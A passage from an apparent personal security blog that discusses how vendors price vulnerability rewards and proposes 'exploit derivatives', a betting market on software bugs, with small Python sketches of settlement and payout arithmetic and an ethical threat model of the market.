Now, of course, there is an obvious profit opportunity here. Why not buy the bugs from those security researchers that find them in their spare time for fun, and resell them to "exploiters" for 10x the price? Well, that happens! Bug brokers do precisely that. The prices from these "bug brokers" are then limited only by how much the "exploiters" are willing to pay for them (which is a lot; more on that below).

However, and very importantly, we haven't discussed the cost of going from vulnerability to exploit. Depending on the vulnerability type, that might either be trivial (for some design/logic flaw issues) or very difficult (for some memory corruption issues).

Now, surprisingly, this key difference might give vendors a fighting chance. Software vendors in their mission to make their software better, actually don't care (or at least shouldn't care) about the difficulty to write a reliable exploit. Vendors want the vulnerability to fix it, learn from it, and find ways to prevent it from happening again.

This means that a software vendor should be able to get and find value from a vulnerability immediately, while if you wanted to make an exploit and sell it to those that want to exploit it, that would cost a significant amount of additional research and effort if there are a lot of mitigations along the way (sandboxes, isolation, etc).

So, it seems that the vendor's best chance in the "vendor" vs. "exploiter" competition is twofold: (1) to focus on making exploits harder and more expensive to write, and (2) to focus on making vulnerabilities as profitable to find and report as possible. The goal is that eventually the cost of "weaponizing" a vulnerability becomes higher than the cost of finding the next bug.

The second answer to this question is about the economics from the "exploiters'" and the vendors' perspective.

For the vendors, software engineering is so imperfect that if you have a large application, you will have a lot of bugs and you will introduce more the more you code.

So for software vendors, learning of a lot of vulnerabilities isn't as valuable as preventing those many from happening in the first place. In other words, being notified of a vulnerability is not useful except if that knowledge is used to prevent the next one from happening.

Prices then (for vendors) should be, first of all, set to match the traffic these vendors can handle, including not just the response but the corresponding remediation work. So if the vendor has 2 full-time engineers staffed to respond to security vulnerabilities, the prices should be set to attract approximately 2 full-time engineers' worth of reports.

And then, on top of that, as many engineering resources as possible should be focused on prevention (to make vulnerabilities harder to introduce), optimizing processes (to be able to handle a larger number of reports), and finally making exploits harder to write (to make finding the next bug cheaper than writing an exploit).

For the "exploiters", if they didn't have these vulnerabilities, their alternative would be to do dangerous and expensive human intelligence operations. Bribing, spying, interrogating, sabotaging etc.. all of these expensive and limited by the amount of people you can train, the amount of assets you can turn, and the amount of money they will ask for, and then your ability to keep all of this secret. Human intelligence is really very expensive.

On the other hand, they could use these security holes - super attractive capabilities that allow them to spy on those they want to spy on, reducing (or sometimes eliminating) the need for any of the human intelligence operations and their associated risks. How can it get better than that?

So they have the budget and ability to pay large sums of money. However, the vulnerability market isn't efficient enough for that larger price to matter as much.

What this market inefficiency means is that if someone can make $X00,000 a year by just finding vulnerabilities (and ignoring the exploit writing), then spending a month or two writing a reliable exploit comes at the cost of the lost opportunity of the vulnerabilities that would have been found in that time. And vendors could take advantage of this opportunity.

In conclusion, it seems to me that the optimal way for vendors to price vulnerabilities is to do so based on:
(1) identifying the vulnerabilities that are in the critical path of an exploit, and
(2) ignoring mitigations as much as possible, for the purpose of vulnerability reward decisions.

And that will only have the intended effect if:
(a) vendors make a proper investment in remediation, prevention and mitigation, as otherwise they don't get any value out of buying these vulnerabilities; and
(b) we change our reliance on requiring full PoCs from security researchers, if we want to get vulnerabilities and learn from them.

Thank you for reading, and please comment below or on Twitter if you disagree with anything or have any comments.

Monday, March 28, 2016

Creating a Decentralized Security Rewards Market

Imagine a world where you, a security researcher, could make money on your open source contributions, and your expertise about the security of any software. Without the intervention of the vendor, and without having to sell vulnerabilities to shady (and not-so-shady) third-parties.

That is, on top of bug bounty programs, or 0-day gray markets, you could make money by following any disclosure policy you wish.

That's exactly what Rainer Böhme imagined over 10 years ago, with what he called "Exploit Derivatives", which is what I want to draw attention to today.

Hopefully, by the end of this post you'll be convinced that such a market would be good for the internet and can be made possible with today's technology and infrastructure, either officially (backed by financial institutions), or unofficially (backed by cryptocurrencies).

The advantages to software users

First of all, let me explain where the money would come from, and why.
Imagine Carlos, a Webmaster and SysAdmin for about 100 small businesses (dentists, restaurants, pet stores, and so on) in Argentina. Most of Carlos' clients just need email and a simple Wordpress installation. 
Now, Carlos' business grew slowly but consistently, since more and more businesses wanted to go online, and word of Carlos' exceptional customer service spread. But as his client pool grew, the time he had to spend doing maintenance increased significantly. Since each client had a slightly customized installation for one reason or another, breakage happened every time an upgrade was scheduled, and attacks ranging from DoS to simple malware looking for SQL injection bugs left Carlos with less and less time to onboard new customers.
Users that depend on the security of a given piece of software would fund security research and development indirectly. They would do this by taking part in an open market to protect (or "hedge") their risk against a security vulnerability in the software they depend on.

The way they would do this "hedge" is by participating in a bet. Users would bet that the software they use will have a bug. Essentially, they would be betting against their own interests. This might sound strange, but it's not. Let me give you an example.

Imagine that you went to a pub to watch a soccer game of your favorite team against some obscure small new team. There's a 90% chance your favorite team will win, but if your team happened to lose, you would feel awful (nobody wants to lose against the small new team). You don't want to feel awful, so you bet against your own team (that is, you bet that your favorite team will lose) to the guy sitting next to you. Since the odds are 9:1 in favor of your favorite team, you would have to pay 1 USD to get 10 USD back (making a 9 USD profit), which you can use to buy a pint of beer for you and your friend.

This way, in the likely case your favorite team wins, you forfeit 1 USD, but feel great, because your team won! And in the unlikely case your favorite team loses, you get 10 USD and buy a pint of beer for you and your friend. While in reality loyalty to your team might keep most soccer fans from doing this, there's nothing stopping you from "betting" against your interests to do some damage control, and that's what is called "hedging" in finance.

This "hedge" could be used by Carlos in our example by betting that there will be a vulnerability in case he has to do an out-of-schedule upgrade on all his clients. If it doesn't happen, then good! He loses the bet, but doesn't have to do an upgrade. If he wins the bet, then he would get some money.

Companies usually do this because it reduces their volatility (eg, the quarter-to-quarter differences in returns), which makes them more stable, which in turn makes them more predictable, which means they become more valuable as a company.

Bug hunters joining the financial market

OK, this must sound like a ridiculous idea, and I must admit I worded it like this to make it sound crazy, but bear with me for a second. Bug hunters are the ones with the most to win in this market, and I'll explain why.

Today's security researchers have a couple ways to earn money off their expertise:
  1. By contracting their expertise through a pentesting firm to software vendors, and users.
  2. By reporting bugs to the vendor, who might issue a reward in return (commonly called bug bounty programs).
  3. By reporting bugs in any way or form, and getting paid by interested parties (such as the internet bug bounty).
  4. And to a lesser extent, by hardening code, and claiming bounties for patches to OSS software (via open source bounties, or patch reward programs).
Böhme's proposal is to add a new source of revenue for bug hunters, in the form of a financial instrument with the following properties:
  • A one-time effort continues to yield returns in the long term
  • Not finding bugs is also profitable (almost as much as finding them)
  • Vulnerability price is driven by software security and popularity
  • Provides an incentive to harden software to be more secure
These properties make this market extremely attractive for bug hunters, especially for those able to find hard-to-find bugs, as explained below.

Introducing exploit derivatives

The idea is simple. Allow bug hunters to trade with each other on their confidence on the security of a given piece of software, and allow users to hedge their risk on such market.
Mallory reviews some piece of software used by Carlos, say a Wordpress Vimeo plugin. Mallory thinks that while it's very badly written, there are no vulnerabilities in the code as currently written (say, out of luck, or simply because old exploitable bugs were fixed as they were found). As a result, Mallory "bets" that there won't be a bug in the Wordpress Vimeo plugin within the next year, and is willing to bet 100 USD that there won't be a bug against anyone willing to give her 10 USD. If there's a bug, Mallory has to pay 100 USD, but if there isn't one, Mallory gets 10 USD. In other words, Mallory would get a 10% ROI (return on investment).
Carlos, as we explained above, has over a hundred customers, and deploying an update to all of them would cost him at least one extra hour of work (on average). So Carlos decides to take Mallory up on the bet. If he loses the bet, no problem, he lost 10 USD; but if he wins, he gets some money for spending an hour on maintenance.
By allowing users to trade "bets" (or, as they are called in finance, binary options) with bug hunters, the market satisfies the needs of both sides (the user "hedges" his risk to the market, and the bug hunter earns money). If there happens to be a bug, Mallory has to pay, sure, and she might lose money, but on average Mallory would earn more money, since she is the one setting her minimum price.

Trading contracts with other bug hunters

Fig. 1 from Böhme 2006 [*]
An important aspect of this market is the ability for contracts to be traded with other bug hunters. That is because, over time the understanding of a given piece of code might change, as other bug hunters would have more time to review large code bases further and with more scrutiny.

As a result, it's important to be able to allow contracts to be exchanged and traded for a higher (if confidence in the software increased) or lower (if confidence in the software decreased) value.
Eve, on the other side of the world, did a penetration test of the Wordpress Vimeo plugin. Eve reaches a similar conclusion to Mallory's; however, Eve is a lot more confident in the security of the plugin. She had actually found many bugs in the plugin in the past, all of which were patched by Eve herself, so she is very confident in its security, and offers a bet similar to Mallory's, but a bit cheaper: she is willing to bet 100 USD that there won't be a bug against anyone willing to give her 5 USD!
At this point, Mallory can make money by simply buying this bet from Eve, unless Mallory is extremely confident there will not be a bug in the plugin. This is because if Mallory buys the bet, she will make a 5 USD profit no matter what happens. For example: if there is a bug, and Mallory loses her bet, she will get 100 USD from Eve, and then Mallory will give the 100 USD to Carlos. If there is no bug, then Mallory just made a 5 USD profit. This is what is known in finance as an "arbitrage opportunity".
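To spell out the arithmetic of that arbitrage (Mallory received 10 USD from Carlos, and pays Eve 5 USD for her bet):
  • If there is no bug: Mallory keeps the 10 USD from Carlos, minus the 5 USD paid to Eve, for a net profit of 5 USD.
  • If there is a bug: Mallory collects 100 USD from Eve and pays 100 USD to Carlos, which cancels out, so she again nets the 10 USD minus the 5 USD, a 5 USD profit.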
And obviously, this allows speculators (people that buy and sell these contracts looking to make a profit, but who aren't users or bug hunters) and market makers to join the market. Speculators and market makers provide an important service: they provide "liquidity", because they supply more contracts than would be available from just users or bug hunters (liquidity is a financial term that means it's very easy to buy and sell things in a market).

Market makers - what? who? why?

The "market makers" are people that buy or sell financial instruments in bulk at a guaranteed price. They are essential to the market, not just because they make buying and selling contracts easier, but also because they make the price a lot more stable and predictable. Usually, the market makers are the ones that end up profiting the most off the market (but they also face a lot of risks in the process).

However, in the exploit derivatives market, profit isn't the only incentive to become a market maker. Ultimately, what the market price defines is the probability of an exploit being published before a given date. Market makers can make the exchange of a specific type of exploit derivative a lot more accessible to participants (both bug hunters and users), making these predictions a lot more accurate.

To give an example, imagine a market maker buys 1,000 options for "there will be a bug", and 1,000 options for "there won't be a bug" (with the same example of Carlos, Eve and Mallory). Without the market maker, Carlos would have to find Eve and Eve would have to find Mallory, which might be difficult. On the other hand, if a market maker exists, then they just need to know of the market maker at the exchange and buy/sell to it.

As long as the market makers sell as many options on each side, the risk is minimized. The market maker would then purchase as many options as it needs to balance its risk, or raise the price as needed (for instance, if everyone wants to buy "there will be a bug", then it has to increase its price accordingly).

And in case it wasn't obvious by now, the more "liquidity" on the market, then the more accurate the prices become. And the more accurate they become, the more value there is in exploit derivatives as a "prediction" market. Note that another service provided by this is the decentralized aggregated knowledge of the security community to predict whether a vulnerability exists or not, and that provides value to the community in and of itself[*].

What happens if there's a bug?

When someone finds a bug, then the finder can make a lot of money! And that's the whole point of this blog post. This creates a strong financial incentive to do security research and make money off it in a more distributed manner that is compatible with existing vulnerability reward programs.

The way this would work is: when you find a bug, you just buy as many "bets" for "there will be a bug" as you can, and then you report it to the vendor, or post it to full disclosure... whatever works for you. This essentially guarantees you will win the bet and make a profit.

What's most interesting about this, is that the profit you can make is defined by the market itself, not the vendor. This means that the software that the market believes to be most secure, as well as the most popular software would yield the most money. And this actually incentivizes bug hunters to look at the most important pieces of infrastructure for the internet at any given point in time.

This also is likely to provide a higher price for bugs than existing security reward programs, and since they aren't incompatible (as currently defined), there isn't a concern on getting both a reward and returns from the market.

Note that this is actually symmetric with not finding a bug: not finding a bug yields profits from those trying to hedge the risk that a vulnerability exists, while finding one yields profits from those who didn't find the bug.

Funding hardening and secure development

One of the best things about this market is that it would create a financial incentive to write secure software and to harden and patch existing software, something our industry hasn't done a particularly great job at.

There are two ways to fund secure development with exploit derivatives:
  • By bug hunters that have a long-term bet on the security of a product and want to protect that position
  • By donations to software vendors contingent on having no vulnerabilities for some time
Let me explain. If a bug hunter has a one-year bet that there won't be a new bug, then unless the project has very little development and a history of being very secure, the bug hunter has a strong incentive to make sure new bugs are hard to introduce. The bug hunter could do this by refactoring APIs to be inherently secure, improving test coverage, and improving the project's overall engineering practices.

The other way this funds secure development is by making donations contingent on the absence of vulnerabilities. It would be possible to donate, say, 50 USD to an open source project, and give an extra 50 USD only if there are no vulnerabilities for a year (and if there are, the donor gets that money back).
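Here is a minimal sketch (my own, not a spec) of how the contingent half of such a donation could settle. The project name, deadline and the bug_published_before oracle are hypothetical; in practice the oracle could be the same referee that settles the exploit-derivative contracts:

from datetime import date

def settle_contingent_donation(amount_usd, project, deadline, bug_published_before):
    """Release the escrowed donation to the project, or refund the donor."""
    if bug_published_before(project, deadline):
        return ("refund_donor", amount_usd)
    return ("pay_project", amount_usd)

# The extra 50 USD from the example above, contingent on a bug-free year.
outcome = settle_contingent_donation(
    amount_usd=50,
    project="some-open-source-project",
    deadline=date(2018, 1, 1),
    bug_published_before=lambda project, deadline: False,  # the referee reported no bug
)
print(outcome)  # ('pay_project', 50)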

Who decides what's a valid bug?

Who would be the decider for what is and isn't a bug? In the end, these people would have a lot of power over such a market. And in my experience on the vendor side of vulnerability reward programs, what is and isn't a bug is often difficult to decide objectively.

To compensate for this risk, as with any financial decision, one must "diversify" - in this case, diversifying means choosing as many "referees" (or "bug deciders") as possible.

Today, CERTs provide such a service, as do vendors (through security advisories). As a result, one can make a bet that settles based on those pieces of information (eg. CVSSv3 score above 7.0, or bounty above $3,000). However, these might not always capture what the user wants the bet to represent, and for those cases it would be better to create an incentive for market-specific deciders to make the call.

One way to solve this problem, as pointed out by Böhme, is to make the conditions as clear as possible (which could make arbitration very cheap). One could imagine a preconfigured VM or Docker image that includes some "flags"; if, under a specific attack scenario (eg, same network, remote attacker, minimal user interaction), an attacker can compromise a flag, the contract settles as "there was a bug". This is akin to a CTF competition, and the outcome would be quite obvious in the majority of cases.
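A minimal sketch of that CTF-style check (the flag value and the idea of submitting it as proof-of-compromise are my own illustration, not part of the original proposal):

import hashlib
import hmac

# Digest of the secret flag planted in the reference image shipped with the contract terms.
FLAG_DIGEST = hashlib.sha256(b"FLAG{planted-in-the-reference-image}").hexdigest()

def exploit_is_valid(submitted_flag: str) -> bool:
    """A claim settles as "there was a bug" only if the submitted flag matches."""
    digest = hashlib.sha256(submitted_flag.encode()).hexdigest()
    return hmac.compare_digest(digest, FLAG_DIGEST)

print(exploit_is_valid("FLAG{planted-in-the-reference-image}"))  # True
print(exploit_is_valid("FLAG{not-the-flag}"))                    # False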

For more complex vulnerabilities or exploits, one might want human judgment to decide on the validity of an exploit. For example, the recent CVE-2015-7547 (glibc getaddrinfo stack-based buffer overflow) has exploitation requirements that clearly apply to most users, but might seem far-fetched to others. Having a trusted referee with sufficient expertise to decide and have the final say would go a long way toward creating a stable market.

And this actually creates another profit opportunity for widely known and trusted bug hunters. If referees get a fee for their services, they can make a profit simply for deciding whether a piece of software has a known valid vulnerability or not. The most cool-headed, impartial referees would eventually earn higher fees based on their reputation in the community.

That said, human-based decisions would introduce ambiguity, and the more judgment you give the referees, the more expensive they become (essentially to offset the incentive to accept bribes). While reputation might help prevent misbehavior by referees, in the long term it would be better for the market (and a lot cheaper) to use CTF-style decisions rather than depending on someone's judgment.

Vulnerability insurance and exploit derivatives

It's worth noting that while exploit derivatives look similar to insurance, they are quite different. Some important differences from insurance are:
  • With insurance, you usually only get paid for a loss you can demonstrate. Here, money changes hands even when there is no loss! In other words, if a user buys an insurance policy to cover losses from getting hacked, they get their costs covered up to a specific amount. With a hedge, you get paid even if you suffered no loss (this essentially makes hedging a lot more expensive than insurance).
  • Another important difference is that insurers won't write a policy for just anyone, while anyone can trade a binary option as long as they have the funds to do so. This is because your personal risk of loss is irrelevant to the market; when you are trading options, your identity is irrelevant.
That said, one could easily build an insurance product on top of exploit derivatives. The insurer would reduce the price of the policy by only paying for actual, demonstrable losses, and would adjust the price of each policy depending on the risk the policy holder bears.
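To make the difference concrete (made-up numbers, my own illustration): a hedge pays out whenever the event happens, while an insurance policy only reimburses a demonstrated loss, up to a cap.

def hedge_payout(contracts, bug_published):
    # Binary contracts pay 1 unit each if the event happens, regardless of losses.
    return contracts * 1.0 if bug_published else 0.0

def insurance_payout(demonstrated_loss, cap):
    # Insurance only reimburses what you can demonstrate, up to the policy cap.
    return min(demonstrated_loss, cap)

# A bug is published, but this particular user wasn't actually compromised:
print(hedge_payout(contracts=1000, bug_published=True))    # 1000.0 - paid anyway
print(insurance_payout(demonstrated_loss=0, cap=1000))     # 0 - no loss, no payout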

Note, however, that this is not the only way to do it. There is a lot of research on hedging risks with "information security financial instruments", led by Pankaj Pandey and Einar Arthur Snekkenes, who explain how several different incentives and markets can be built for this purpose[1][2][3][4].

Incentives, ethics and law

Exploit derivatives might create new incentives, some of which might look unsettling, mostly related to different types of market manipulation:
  • Preventing vulnerability disclosure
  • Transferring risk from vendors to the community
  • Spreading lies and rumors
  • Legality and insider trading
  • Introducing vulnerabilities on purpose
I think it's interesting to discuss them, mostly because while some raise valid concerns, some others seem to be just misunderstandings, which we might be able to clarify. Think of this as a threat model.

Preventing vulnerability disclosure

An interesting incentive that Micah Schwalb pointed out in his 2007 paper on the subject ("Exploit derivatives and national security") is that software vendors in the United States might have several resources at their disposal to prevent the public disclosure of security vulnerabilities. Specifically, he pointed out how several laws (the DMCA, trade secrets law, and critical infrastructure statutes) have been used, or could be used, by vendors to keep vulnerabilities secret forever.

It's clear that if vulnerabilities are never made public, it's very difficult to create a market like Exploit Derivatives, and that was the main argument Schwalb presented. However, we live in a different world now, where public disclosure of vulnerabilities is not only tolerated by software vendors, but celebrated and remunerated via vulnerability reward programs.

The concerns Schwalb presented would still be valid for vendors that attempt to silence security research. Fortunately for customers, however, a lot of vendors now take a more open and transparent approach, and public discussion of (fixed) vulnerabilities is supported by our industry.

Transferring risk from vendors to the community

One interesting consequence of a market like this, as pointed out by David, is that it would transfer the financial risk of having a security vulnerability away from the software vendor and push it towards the security community. That is because if the vendor is not involved, the vendor can't lose any money in the market for writing insecure software.

However, the most important thing to notice here is that the vendor is part of the market in a way, even if it doesn't want to be, because the vendor is the only one that can make the software better (for non-free software). If the software's "security" trades at a very low price, there's a clear financial incentive for the vendor to improve it. For example, if the market pays 9:1 that there will be a bug in a given piece of software, the vendor can earn 10x its stake if it can make sure there are no more bugs. So yes, the vendor doesn't have to absorb any risk for having a vulnerability, but it gets an incentive to improve the software instead.
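Putting illustrative numbers on that 9:1 example (again assuming binary contracts that pay 1 unit):

price_no_bug = 0.10                        # implied 9:1 odds that a bug will appear
stake = 10_000                             # what the vendor spends on "no bug" contracts
contracts = stake / price_no_bug           # 100,000 contracts
payout_if_no_bug = contracts * 1.0         # 100,000 if no qualifying bug is published
print(payout_if_no_bug / stake)            # 10.0 - the "10x" return mentioned above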

Eventually, the vendor would stop investing in security as soon as the market stops demanding it, leading to software that is as secure as its users want it to be (or more, if the vendor chooses, for other reasons).

Spreading lies and rumors

Real markets have historically been vulnerable to social engineering. In fact, there are countless examples of media misunderstandings or mistranslations having dire consequences for the economy.

Additionally, things like ZDI's upcoming advisories list would suddenly become extremely profitable if someone were to hack or MITM that page at the right time. The same goes for "side channels" around security vulnerabilities, or embargoes of vulnerabilities in popular software.

And, as lcamtuf pointed out, some of these channels could be abused without any targeted attack at all. An early heads-up from a trusted maintainer could be spoofed, and wiki pages used for security announcements could easily be used to manipulate the market if anyone can edit them.

If anything, the media tends to exaggerate news stories. A small vulnerability is often amplified a hundred times by the media, which could cause chaos in the market. At that point, referees wouldn't even have to be involved, and trading would just be based on speculation.

But this is a perfect arbitrage opportunity for those who get a chance to notice it. In this case, one could check the headers of the email, double-check the statement with the maintainer, or just see who made the update to the wiki. If something looks fishy, a speculator would be able to capitalize on the market uncertainty and bring the price back to normal. This is essentially how the free market deals with this risk in other markets.

Finally, this would incentivize software maintainers to improve their security patch release coordination. Perhaps it would make CERT more popular, or at least it would create an incentive for CERT to act as a trusted third party for the release and scoring of software vulnerabilities, which would also end up being good for the market.

Insider trading and vulnerabilities

If you thought of insider trading when reading about creating a vulnerability market, you are not alone. But insider trading is a commonly misunderstood concept, and it doesn't really apply to most freelance bug hunters trading exploit derivatives (although it might apply to developers and employees of some companies). Let me explain.

Insider trading is essentially when someone with a "fiduciary duty" (explained below) and access to non-public information makes a trade in the market. You might think this means that if someone finds a bug, they would be committing insider trading by "betting" that there will be a bug, but for most bug hunters this really shouldn't be the case.

First of all, for open source software, where no binary analysis or reverse engineering is required, the bug hunter would be acting on public information (the source code) when making the trade. The fact that the bug hunter was able to spot a vulnerability is equivalent to a financial analyst being able to spot an arbitrage opportunity in the market.

Another point is that the majority of bug hunters shouldn't have a "fiduciary duty" to other market participants, so there shouldn't be a conflict of interest there. Here's the definition of fiduciary duty:
A fiduciary duty is a legal duty to act solely in another party's interests. Parties owing this duty are called fiduciaries. The individuals to whom they owe a duty are called principals. Fiduciaries may not profit from their relationship with their principals unless they have the principals' express informed consent.
https://www.law.cornell.edu/wex/fiduciary_duty
Employees (whether developers, bug hunters or otherwise) of companies that use the software, however, might be restricted from engaging in such trades, depending on how and when they got the information[*]. For a final say on the subject, participants would have to get advice from a lawyer with experience in securities and corporate law.

Note, however, that insider trading wouldn't necessarily be bad for this market [1][2], and this wouldn't even be something to worry about until a market like this is regulated (if it ever is). Either way, that's a discussion better left to economists and lawyers, not security researchers :)

On the other hand, looking at the benefits of having companies participate in this market:
  • Employers could give exploit derivatives to employees as compensation, in bundles that pay out if there are no public exploits, as a way to incentivize security, which would be good for both the users and the market. Equity is already a big part of compensation at most companies, especially startups, so adding a new instrument as compensation would give developers a more concrete mechanism to influence its value (by writing more secure software).
  • Victims of 0-day vulnerabilities would have a financial incentive to try to recover the exploit used to attack them (via forensics, reverse engineering or otherwise), since today there's very little incentive for victims to speak out and share technical details. This could of course be done anonymously, as the community would only care about the technical details, not the identity of the victim.

Introducing vulnerabilities on purpose

The most dangerous incentive that a market like this could create is that of introducing vulnerabilities on purpose. Fraud like this is also a danger to the trustworthiness of the market, and because of the distributed nature of open source software, it would be very hard to bring civil or criminal charges against someone who did this. However, the market should address this in two ways:
  • Price - Software that accepts third-party contributions with little oversight, or that has a large development team that might not be as trustworthy, would already be priced as risky, so backdoors or bugs introduced on purpose would yield low returns there. And while introducing a vulnerability without being noticed is definitely possible, software with strict engineering practices and stringent code review processes would end up being the highest valued in the market.
  • Competition - Participants in the market with long-term investments in the security of a piece of software will compete with those trying to introduce bugs. In practice, the stakes are the same on both sides, so it would be just as easy to make money by making the software safer as by doing the opposite (and without the risk incurred by introducing bugs on purpose).
Finally, this could also be mitigated by donations that pay maintainers only if there are no vulnerabilities. Contracts could be structured to limit the risk (say, by requiring code to be in the code base for a long time) and make this avenue less profitable than making the software more secure.

In the end, we would incentivize open source software maintainers to be more careful with the patches they accept and to employ safer engineering practices for their projects. We would also create more oversight by interested third parties and, hopefully, make software safer as a result.

Conclusions

If you've made it this far down the blog post, you might either be as excited about this as I am, or you might be waiting for me to pitch you my new startup! Well, fear not... There is no startup, but I am most definitely ready to abuse your enthusiasm and encourage you to help make this a reality! Either by sharing your thoughts, sharing this with your friends, or reviewing its design.

Exploit derivatives got some attention in the years after the idea was first published, but never wide enough attention in the security community (although in 2011, projects like BeeWise and Consensus Point briefly experimented with it).

It seems that in 2006 our industry had little experience with vulnerability markets, and in 2011 it was still too complex and expensive to set up a prediction market, which probably made the upfront cost of this market extremely high. Fast-forward to 2016, and prediction markets abound[1][2][3] for topics as varied as politics, economics, and entertainment. Creating decentralized markets with cryptocurrency is not only possible and accessible, but also already heavily invested in by the security and open source community (although, surprisingly, not for software security!).

I think experimenting with this market on a cryptocurrency platform would let us test the idea very quickly. For example, we could use Augur (despite its controversy), a recently launched project (currently in beta, so no money is being exchanged yet) that implements a decentralized prediction market which could be used for exploit derivatives among other things (and, most importantly, has an API that could be used to build a security vulnerability prediction market on top of it).

Anyway, to wrap up this blog post, I have one last request. If you are interested in discussing exploit derivatives, I just created a mailing list to talk about it here:
There's nothing on it yet, but I would love to hear your feedback, positive and negative. Especially if you or someone you know has experience in security research, financial markets or security economics.

I would be particularly interested to hear from you if you think this might create other positive or negative incentives in the security or open-source community.

Thank you for reading, and thanks to Rainer, Pankaj, Michal, David, Miki, Dionysis and Mario for their comments.

Note that this is a personal blog. What I say in this blog does not imply in any form an endorsement from my employer, nor necessarily reflects my employer's views or opinions on the subject.